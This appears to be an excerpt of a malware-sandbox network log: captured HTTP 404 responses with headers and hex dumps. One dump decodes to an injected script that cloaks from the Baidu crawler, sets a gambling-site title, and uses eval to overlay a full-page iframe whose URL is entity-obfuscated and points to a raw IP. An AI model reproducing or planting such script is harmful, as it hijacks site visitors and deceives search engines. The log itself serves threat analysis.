Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:21:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:21:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"634bbb43-6cd"Content-Encoding: gzipData Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 28 Nov 2022 09:21:58 GMTContent-Type: text/htmlContent-Length: 1741Connection: closeVary: Accept-EncodingETag: "634bbb43-6cd"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 3e 69 66 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 64 65 78 4f 66 28 22 62 61 69 64 75 22 29 20 3d 3d 20 2d 31 29 7b 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 20 3d 22 e6 be b3 e9 97 a8 e9 93 b6 e6 b2 b3 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 34 35 2e 31 32 32 2e 31 33 38 2e 34 35 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 6c 6e 28 27 27 29 3b 76 61 72 20 73 73 3d 27 3c 64 69 76 20 69 64 3d 22 73 68 6f 77 63 6c 6f 6e 65 73 68 65 6e 67 78 69 61 6f 6e 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 77 69 64 74 68 3a 20 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 69 6e 69 74 69 61 6c 20 69 6e 69 74 69 61 6c 3b 22 3e 3c 69 66 72 61 6d 65 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 79 65 73 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 30 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 30 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 77 69 64 74 68 3d 22 31 34 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 73 72 63 3d 22 26 23 31 30 34 3b 26 23 31 31 36 3b 26 23 31 31 36 3b 26 23 31 31 32 3b 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 30 3b 26 23 35 30 3b 26 23 34 36 3b 26 23 34 39 3b 26 23 35 31 3b 26 23 35 36 3b 26 23 34 36 3b 26 23 35 32 3b 26 23 35 33 3b 26 23 34 37 3b 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 64 69 76 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 74 6d 6c 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 20 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 3c 2f 73 74 79 6c 65 3e 27 3b 65 76 61 6c 28 22 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 22 2b 73 73 2b 22 27 29 3b 22 29 3b 74 72 79 7b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 64 69 76 41 6c 6c 22 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 6
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:22:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HziYbZhquZ%2Fov6%2FikCPvGtQ%2F%2BitFGvARfc0uJtignKrfDoImsyGNfcdMLYGxFJWJNw%2BR2wZ%2FhTk5rYbCVGicwB2l93V1p3s3E6OI1QPlvQsfEdmy4Hi99ioqgYsoqV%2FOiu21B7vU9WITTJA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 77120a3edd239b2d-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 00 00 ff ff 03 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 83(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:22:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rmou6ISsyqUUoMPV%2BrIsLZ%2Bpnjb5oSJ8GfT%2FIHRKMRbKlkvxueafIYn6LPNh2sRUrxEvBD7GvH5rt%2BXezl%2BrekrBygB2oKZLpU7AeV95oriLrLb1sCLIeMc4aAKA83jq5P6JWF%2FvxXJrjZc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 77120a4b9b876983-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 00 00 ff ff 03 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 83(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:22:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i7vd%2F2vOTaKWr6VH%2FBHGpE%2FTUe1%2FIkN8JB9cxc7ShtHFlA%2F0vTtAxm3vGvpg6xSWWNAzM0ckBld5NFtIK%2BGwTvgf1HFAkNGB6zteLfwAHYE2%2BSa9xnhXwW%2Ftxv3P9h3%2FNjpBdg3BPC8tqME%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 77120a584d639a23-FRAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 00 00 ff ff 03 00 37 d7 58 cc a2 00 00 00 0d 0a Data Ascii: 83(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzIy%jaC]7X
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:22:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QWNUWuaUdhq8KYhNBEtJ3nq%2BQJ7Eoz0zU%2BT9kbVbMZhXwt%2FSs6NzwFwHiCFbxl%2BTOx0lqxZu%2BhWWaLqjN4ThEO5P4FrLQdb%2B8YUYoi742yYBV%2BoXynARfus2wQLLRZbpwzmnZCEbwG%2BmOqg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 77120a64fdcf5c1a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:22:48 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11649Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 28 Nov 2022 09:22:50 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://xn--299aa717y.xn--3e0b707e/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gziphost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 11649Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 72 6d 8f ec c8 75 de 67 cd af a8 db 8b dd 99 96 ba d8 24 fb bd 7b 7a 64 ed 6a b5 16 a2 b5 85 bd 2b 1b 81 56 b8 a8 26 0f c9 da 29 56 d1 c5 e2 74 f7 8e 07 10 10 c7 f0 1b 9c 04 96 61 23 90 02 1b 88 e1 04 f9 22 24 0a a0 0f 49 7e 90 f6 ea 3f e4 14 d9 ef c3 9e e9 3b f7 5e 19 89 76 5e 48 d6 a9 73 9e f3 9c e7 3c 97 cf be fd fb 1f 7c fa af bf ff 21 49 4c 2a ae ce 2e ed 8b 08 26 e3 69 e3 5a d1 7f f5 49 c3 c6 80 85 57 67 5f bb 4c c1 30 12 24 4c e7 60 a6 8d 1f 7c fa 1d 3a 6c 90 f6 e6 46 b2 14 a6 8d 1b 0e f3 4c 69 d3 20 81 92 06 24 66 ce 79 68 92 69 08 37 3c 00 5a 1e 5a 84 4b 6e 38 13 34 0f 98 80 a9 57 e2 ec c0 9c 6b 35 53 26 3f df 80 9c 4b c5 65 08 8b 16 91 2a 52 42 a8 f9 79 59 62 b8 11 70 f5 eb bf fe fb 97 3f fb c5 cb 7f fe f1 97 ff f4 bf c8 cb 9f ff 9f 97 3f fb 13 f2 f2 cf fe 9e bc fc bb 3f 7d f9 b3 bf 22 ef bd 33 f4 3d 6f 42 62 15 2b a3 b2 cb 76 55 75 76 29 b8 bc 26 1a c4 f4 3c 94 39 cd 34 44 60 82 e4 9c 24 f8 35 3d 6f b7 17 92 52 7f 34 62 6c e0 0d 96 8e 3d 75 c0 9d 0d dc 01 54 dd 37 f5 0d 26 0c 68 c9 0c 34 88 59 66 a8 03 cb 32 c1 03 66 b8 92 6d 9d e7 df 58 a4 02 af 6c df 69 63 c5 83 bc a7 d9 1f 15 6a 42 7e fd 93 ff f5 e5 df fc b4 51 b5 6d 24 c6 64 e3 87 7a b7 23 80 b0 dd 78 93 0c be fc ab bf f9 d5 2f 7f fc ca 44 02 95 a6 b8 9d 7c 97 51 1e 68 9e 99 ab b3 39 ee 4b cd 9d 17 f3 0c 52 f5 39 7f 0e c6 70 19 e7 64 4a 6e 1b 33 96 c3 0f b4 68 8c cb 1e f9 f8 b3 f6 67 ed dc 99 3b 4a c7 9f b5 79 ca 62 c8 3f 43 70 0d 9f b5 cb e2 cf da 5e d7 71 1d f7 b3 f6 c0 5f 0c fc cf da 8d 56 03 16 06 eb 9d 4c c6 78 c8 6f e2 a7 e1 61 61 89 86 ef 0f 2b 40 fc b2 67 55 e8 00 1a e3 db 06 3a 10 45 2c cb 56 f8 25 fc 71 55 3e 6b cf 33 ca 65 20 8a d0 b6 fd 3c 2f 03 25 00 c5 4d 01 ce ee a4 5c 3a 9f e7 df bc 01 3d ed 3b 9e e3 35 ee ee 26 67 ed af 3f 23 9f 26 3c 27 11 17 40 f0 cd 0a a3 68 0c 12 34 12 08 c9 d7 db 67 cf a2 42 06 76 a3 17 d0 62 2d d3 bc bd 61 9a c8 96 6e a9 16 9f 32 27 d0 80 99 1f 0a b0 5b b9 68 04 4c de b0 bc d1 6c 65 53 ee c4 60 3e 50 d2 a0 6c ef bd b7 7b ba 68 f8 61 a3 39 59 03 93 1c a1 57 c0 6c fa dc 68 5c 9a 13 69 95 7e 90 30 fd 81 0a a1 05 d3 8b cc 09 70 0e fd 09 04 e6 c2 6d b9 2d ee cc 79 68 12 7c 27 c0 e3 c4 60 47 07 87 10 9f 5a 7c e6 58 27 2e 2f 0c 8e d6 82 26 a6 bb 4d cc 34 ea db cc b0 1f 7c f2 bd 8b 66 73 a2 c1 14 5a 92 a7 e3 9a 15 2e 4c a7 d3 3d ec bb cd 60 c1 05 54 63 99 fb 4a 55 a6 45 19 8c 93 eb Data Ascii: rmug${zdj+V&)Vta#"$I~?;^v^Hs<|
